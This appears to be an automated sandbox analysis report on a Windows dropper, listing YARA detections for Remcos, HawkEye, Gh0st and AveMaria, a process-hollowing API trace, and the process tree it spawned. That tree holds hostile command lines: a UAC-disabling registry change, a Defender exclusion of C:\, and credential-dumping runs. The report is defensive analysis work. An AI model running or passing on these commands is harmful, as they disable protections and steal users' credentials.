                    Source: 00000003.00000003.684269184.0000000000D36000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 00000001.00000002.677784097.00000000147A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 00000001.00000002.677784097.00000000147A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 00000001.00000002.677784097.00000000147A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 00000002.00000000.672609321.0000000000403000.00000040.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 00000028.00000002.838427138.0000000004972000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000028.00000002.838427138.0000000004972000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000002C.00000002.921256513.00000000076B0000.00000004.00020000.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 0000002C.00000002.917761840.0000000003881000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000002C.00000002.917761840.0000000003881000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000002.00000000.674013020.0000000000403000.00000040.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 00000009.00000002.931995653.0000000000690000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 00000009.00000002.931995653.0000000000690000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 00000009.00000002.931995653.0000000000690000.00000004.00000001.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 00000009.00000002.931995653.0000000000690000.00000004.00000001.sdmp, type: MEMORYMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 00000003.00000002.939479958.000000000362C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 00000002.00000002.682814093.0000000000403000.00000040.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 00000003.00000003.684248310.0000000000D0E000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 00000028.00000001.798523188.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000028.00000001.798523188.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000028.00000002.838343652.00000000048E0000.00000004.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000028.00000002.838343652.00000000048E0000.00000004.00020000.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 00000028.00000002.838343652.00000000048E0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001D.00000002.731576486.00000000034A2000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 00000002.00000003.676858560.0000000000797000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 00000003.00000002.939106389.0000000002CD6000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 0000002C.00000002.916420859.0000000002881000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000002C.00000002.916420859.0000000002881000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000003.00000000.680273151.000000000021F000.00000002.00020000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 0000002C.00000000.861719615.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000002C.00000000.861719615.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPEDMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPEDMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPEDMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPEDMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exe, type: DROPPEDMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe, type: DROPPEDMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeCode function: 1_2_004030E3 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,1_2_004030E3
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_0041360B ExitWindowsEx,LoadLibraryA,GetProcAddress,4_2_0041360B
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: String function: 004308A0 appears 53 times
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: String function: 004301F3 appears 38 times
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: String function: 00402076 appears 50 times
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_00414B29 CreateProcessW,CloseHandle,CloseHandle,CloseHandle,CloseHandle,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,TerminateProcess,SetThreadContext,ResumeThread,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,4_2_00414B29
                    Source: bin.exe.2.drStatic PE information: Resource name: WM_DSP type: PE32 executable (GUI) Intel 80386, for MS Windows
                    Source: xxTzyGLZx5.exe, 00000001.00000003.668379876.0000000014AEF000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs xxTzyGLZx5.exe
                    Source: xxTzyGLZx5.exe, 00000001.00000003.668147890.0000000014956000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs xxTzyGLZx5.exe
                    Source: xxTzyGLZx5.exe, 00000001.00000002.677784097.00000000147A0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameViottoBinder_Stub.exevs xxTzyGLZx5.exe
                    Source: xxTzyGLZx5.exe, 00000002.00000001.674846942.0000000000403000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameViottoBinder_Stub.exevs xxTzyGLZx5.exe
                    Source: xxTzyGLZx5.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
                    Source: C:\Users\user\AppData\Roaming\Remcos\dwn.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
                    Source: C:\Users\user\AppData\Local\Temp\21.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
                    Source: C:\Users\user\AppData\Local\Temp\bin.exeFile created: C:\Users\user\AppData\Local\Microsoft Vision\
                    Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winEXE@62/52@12/7
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeFile read: C:\Users\desktop.ini
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_00416D71 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,4_2_00416D71
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_00417629 FindResourceA,LoadResource,LockResource,SizeofResource,4_2_00417629
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs"
                    Source: C:\Users\user\AppData\Local\Temp\bin.exeFile created: C:\Program Files\Microsoft DN1
                    Source: xxTzyGLZx5.exeVirustotal: Detection: 30%
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeFile read: C:\Users\user\Desktop\xxTzyGLZx5.exe
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: unknownProcess created: C:\Users\user\Desktop\xxTzyGLZx5.exe "C:\Users\user\Desktop\xxTzyGLZx5.exe"
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeProcess created: C:\Users\user\Desktop\xxTzyGLZx5.exe "C:\Users\user\Desktop\xxTzyGLZx5.exe"
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeProcess created: C:\Users\user\AppData\Local\Temp\bin.exe "C:\Users\user\AppData\Local\Temp\bin.exe" 0
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeProcess created: C:\Users\user\AppData\Local\Temp\rem9090sta.exe "C:\Users\user\AppData\Local\Temp\rem9090sta.exe" 0
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeProcess created: C:\Windows\SysWOW64\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                    Source: C:\Users\user\AppData\Local\Temp\bin.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
                    Source: C:\Users\user\AppData\Local\Temp\bin.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe "C:\Users\user\AppData\Roaming\Remcos\remcos.exe"
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess created: C:\Windows\SysWOW64\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\bin.exe "C:\Users\user\AppData\Local\Temp\bin.exe"
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe C:\Users\user\AppData\Roaming\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\moyvwyrrsmhoowrqsha"
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe C:\Users\user\AppData\Roaming\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\wilgxqclgvztqcfubsndyj"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe "C:\Users\user\AppData\Roaming\Remcos\remcos.exe"
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess created: C:\Users\user\AppData\Roaming\Remcos\dwn.exe "C:\Users\user\AppData\Roaming\Remcos\dwn.exe"
                    Source: C:\Users\user\AppData\Roaming\Remcos\dwn.exeProcess created: C:\Users\user\AppData\Local\Temp\21.exe "C:\Users\user\AppData\Local\Temp\21.exe" 0
                    Source: C:\Users\user\AppData\Roaming\Remcos\dwn.exeProcess created: C:\Users\user\AppData\Local\Temp\5.exe "C:\Users\user\AppData\Local\Temp\5.exe" 0
                    Source: C:\Users\user\AppData\Roaming\Remcos\dwn.exeProcess created: C:\Users\user\AppData\Local\Temp\4.exe "C:\Users\user\AppData\Local\Temp\4.exe" 0
                    Source: C:\Users\user\AppData\Local\Temp\21.exeProcess created: C:\Users\user\AppData\Local\Temp\21.exe "C:\Users\user\AppData\Local\Temp\21.exe" 0
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess created: C:\Users\user\AppData\Local\Temp\5.exe "C:\Users\user\AppData\Local\Temp\5.exe" 0
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess created: C:\Users\user\AppData\Local\Temp\4.exe "C:\Users\user\AppData\Local\Temp\4.exe" 0
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess created: C:\Users\user\AppData\Roaming\Windows Update.exe "C:\Users\user\AppData\Roaming\Windows Update.exe"
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Users\user\AppData\Roaming\Windows Update.exe "C:\Users\user\AppData\Roaming\Windows Update.exe"
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2132
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holdermail.txt"
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holderwb.txt"
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_00414367 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,4_2_00414367
                    Source: C:\Users\user\AppData\Local\Temp\4.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\4.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeSystem information queried: HandleInformation
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeFile created: C:\Users\user\AppData\Local\Temp\nstE23F.tmp
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeCode function: 1_2_00402012 CoCreateInstance,MultiByteToWideChar,1_2_00402012
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeCode function: 1_2_0040411B GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,1_2_0040411B
                    Source: bin.exe, 00000003.00000003.840888944.00000000046E1000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.840241692.0000000000D93000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.840177868.0000000000D85000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.943517281.0000000004128000.00000004.00000010.sdmp, bin.exe, 00000003.00000003.846003061.00000000047E0000.00000040.00000001.sdmp, bin.exe, 00000003.00000003.839090036.0000000000D76000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.839114022.0000000000D84000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.945019121.0000000004876000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.943929284.00000000041B9000.00000004.00000010.sdmp, bin.exe, 00000003.00000003.840539619.00000000046EF000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000002.756430645.0000000000400000.00000040.00000001.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE 